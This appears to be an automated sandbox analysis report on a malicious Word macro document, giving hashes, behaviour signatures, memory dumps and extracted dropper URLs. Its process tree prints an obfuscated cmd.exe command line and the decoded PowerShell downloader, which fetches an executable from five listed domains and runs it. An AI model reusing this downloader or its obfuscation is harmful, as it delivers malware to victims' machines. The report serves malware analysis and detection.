Analysis

  • max time kernel
    172s
  • max time network
    223s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-07-2022 09:13

General

  • Target

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc

  • Size

    112KB

  • MD5

    bb7ac1a1873e29db1f7ad69aaf4a8127

  • SHA1

    e7a082ff41d8cc4a09d3f852c46cfb808659b476

  • SHA256

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

  • SHA512

    9bd8f53a8dc5bf852ce2b59f9ab697022679b1d167311c437bb56b6509a6a6c81aafd2092f88ec2e87eca5172fb022224b784d4238200a1cf33eace07ea575dd

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://solvolab.com/sdB

exe.dropper

http://kenstones.com/pR

exe.dropper

http://benvisuals.com/S2hMkKS

exe.dropper

http://www.clinicacirurgiaplasticasp.com.br/Jmz

exe.dropper

http://pride.ge/0e40iT

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Windows\SYSTEM32\CMd.exe
      CMd /V/C"^s^e^t ^x^i^U^5=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^aer^b;^E^z^l^$^ ^m^e^t^I^-^e^kovn^I^;)^E^z^l$^ ^,^A^Q^L^$(^e^l^i^F^d^a^olnw^o^D^.^pr^Y^$^{^yrt^{)Cr^b^$^ n^i^ ^A^Q^L^$(^hc^a^er^o^f^;'^e^x^e^.^'+^p^JH^$^+^'^\^'^+c^i^l^b^u^p^:vn^e^$=^E^z^l^$^;^'^2^3^4^'^ ^=^ ^p^J^H^$^;)^'^@^'(^t^i^l^p^S^.'^T^i0^4^e^0/e^g^.^e^d^irp//^:^p^t^t^h^@^z^m^J/r^b^.^m^oc^.^p^s^ac^i^t^s^a^l^p^a^i^gr^ur^ic^acin^i^lc^.^w^w^w//^:^p^t^t^h^@^S^Kk^M^h2^S/^m^oc^.^s^l^a^us^ivn^e^b//^:^p^t^t^h^@R^p/^moc.^s^en^o^t^sn^e^k//^:^p^t^t^h^@^B^d^s/^moc^.^b^a^l^ov^lo^s//^:p^t^t^h^'=Cr^b^$;^tn^e^i^lC^b^e^W^.^t^eN^ ^tce^j^b^o^-^w^en^=^pr^Y^$^ ^l^l^e^h^sr^ewo^p&&^f^or /^L %^P ^in (^3^5^8^,^-^1,^0)^d^o ^s^e^t sX=!sX!!^x^i^U^5:~%^P,1!&&^i^f %^P=^=^0 c^a^l^l %sX:^~^4%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:1272
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $Yrp=new-object Net.WebClient;$brC='http://solvolab.com/sdB@http://kenstones.com/pR@http://benvisuals.com/S2hMkKS@http://www.clinicacirurgiaplasticasp.com.br/Jmz@http://pride.ge/0e40iT'.Split('@');$HJp = '432';$lzE=$env:public+'\'+$HJp+'.exe';foreach($LQA in $brC){try{$Yrp.DownloadFile($LQA, $lzE);Invoke-Item $lzE;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3236

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2172-146-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp

    Filesize

    64KB

  • memory/2172-130-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp

    Filesize

    64KB

  • memory/2172-133-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp

    Filesize

    64KB

  • memory/2172-134-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp

    Filesize

    64KB

  • memory/2172-143-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp

    Filesize

    64KB

  • memory/2172-136-0x00007FFF50640000-0x00007FFF50650000-memory.dmp

    Filesize

    64KB

  • memory/2172-132-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp

    Filesize

    64KB

  • memory/2172-131-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp

    Filesize

    64KB

  • memory/2172-135-0x00007FFF50640000-0x00007FFF50650000-memory.dmp

    Filesize

    64KB

  • memory/2172-144-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp

    Filesize

    64KB

  • memory/2172-145-0x00007FFF52E50000-0x00007FFF52E60000-memory.dmp

    Filesize

    64KB

  • memory/3236-139-0x000001F7EFD20000-0x000001F7EFD42000-memory.dmp

    Filesize

    136KB

  • memory/3236-141-0x00007FFF66C00000-0x00007FFF676C1000-memory.dmp

    Filesize

    10.8MB

  • memory/3236-140-0x00007FFF66C00000-0x00007FFF676C1000-memory.dmp

    Filesize

    10.8MB

  • memory/3236-147-0x00007FFF66C00000-0x00007FFF676C1000-memory.dmp

    Filesize

    10.8MB